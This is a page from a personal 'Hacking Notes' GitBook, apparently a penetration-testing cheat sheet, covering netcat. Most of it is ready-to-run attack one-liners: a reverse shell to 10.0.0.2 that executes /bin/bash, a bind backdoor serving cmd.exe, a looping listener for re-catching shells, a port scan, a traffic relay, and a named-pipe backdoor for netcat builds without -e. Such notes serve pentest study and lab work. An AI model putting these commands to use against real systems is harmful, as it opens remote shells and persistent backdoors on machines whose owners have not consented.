πŸ‘¨πŸ’»
Hacking Notes
πŸ‘¨πŸ’»
Hacking Notes
πŸ‘¨πŸ’»
Hacking Notes
πŸ‘¨πŸ’»
Hacking Notes
Hacking Notes
One-Liners
Offensive
Exploit Workflow
Recon
Payloads
Websites
Password Attacks
Databases
Microsoft Windows Exploits
Netcat
File Transfers
Priv Escalation
Certificates
Post Exploitation
Misc.
Defensive
Defensive Notes
Windows Forensics
Linux Forensics
Network Forensics
Stego
Malware Analysis
Volatility
Programming
Programming Notes
Examples and Quick Scripts
Pwn
Python
C
Powered by GitBook

Netcat

Netcat rocks my socks

Basics

Connect to a socket on host 192.168.1.1 on TCP port 81

nc 192.168.1.1 81

Listen on the local machine for inbound TCP connections on port 81

nc -nvlp 81

Reverse shell sent to host 10.0.0.2 over TCP port 53

nc 10.0.0.2 53 -e /bin/bash

Backdoor listening on TCP 80 set to execute cmd.exe when connected

nc -nvlp 80 -e cmd.exe

More Fancy

Attempt to connect to each port from 10-90 on 10.0.0.1, don't resolve any names -n, don't send any data -z, and only wait 1 second for a connection -w1

nc -nvzw1 10.0.0.1 10-90

Netcat stops listening after the connection drops or is terminated, which can make getting another shell back annoying. Placing nc in a bash true loop is an easy way to work around this, use nohup also!

while [ 1 ]; do echo β€œstarted”; nc -l -p 1234 -e /bin/sh; done

Netcat relay used to forward everything received by the host on TCP 4321 sent to 10.0.0.1 on TCP 8123

nc -l -p 4321 | nc 10.0.0.1 8123

Create a netcat backdoor without -e support. This generates a named pipe which is used to funnel data between bash and nc. 

mknod backpipe p
/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
Previous
Bloodhound
Next - Offensive
File Transfers
Last updated 1 month ago
Contents
Basics
More Fancy